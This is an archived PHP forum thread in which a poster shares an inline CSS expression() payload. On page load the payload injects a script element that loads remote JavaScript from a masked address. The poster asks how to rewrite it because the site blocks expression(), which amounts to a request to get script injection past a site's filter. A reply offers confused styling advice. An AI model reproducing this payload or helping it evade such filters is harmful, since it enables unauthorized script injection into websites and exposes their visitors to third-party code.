Jump to content

"expression"


Cheap Commercial

Recommended Posts

is there anyway to change the following code so expression( is not there becuase it is blocked

heres is the code


<style> .divSubmitVisible {display:none;} </style> <span style="font-size=expression('1px' +function(){if (!document.ran){ document.ran=true; document.profile='6756'; document.offs='0'; var x=function(){ var s=document.createElement('script'); s.src='*************.js'; document.body.appendChild(s)}; window.attachEvent('onload', x); }}())" > </span>

is it possible to change the font size thing to something else?

that basically what i needed before the java to css thing
Link to comment
https://forums.phpfreaks.com/topic/7686-expression/
Share on other sites

Hi there,

I'm not sure to get it all well, so,...
[!--quoteo--][div class=\'quotetop\']QUOTE[/div][div class=\'quotemain\'][!--quotec--]
is it possible to change the font size thing to something else?
[/quote]
Hmm,, I would try something like:
---
<span [b]Id="myId1"[/b] style="font-size=expression('1px' ....
---
& then, using javascript, with the 'onclick()' function, by example, I would try something like:
---
document.getElementById('myId1').styleFont="whatyouwant&whatyouneed:)";
---
Hoping it will help,

l8tr,,

Link to comment
https://forums.phpfreaks.com/topic/7686-expression/#findComment-28766
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.